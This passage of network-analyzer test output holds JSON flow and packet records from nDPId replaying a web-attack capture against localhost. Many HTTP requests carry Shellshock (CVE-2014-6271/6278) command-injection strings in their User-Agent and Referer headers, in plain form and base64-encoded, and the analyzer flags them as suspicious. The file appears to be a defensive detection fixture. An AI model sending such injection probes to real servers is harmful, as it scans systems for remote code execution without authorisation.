{"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 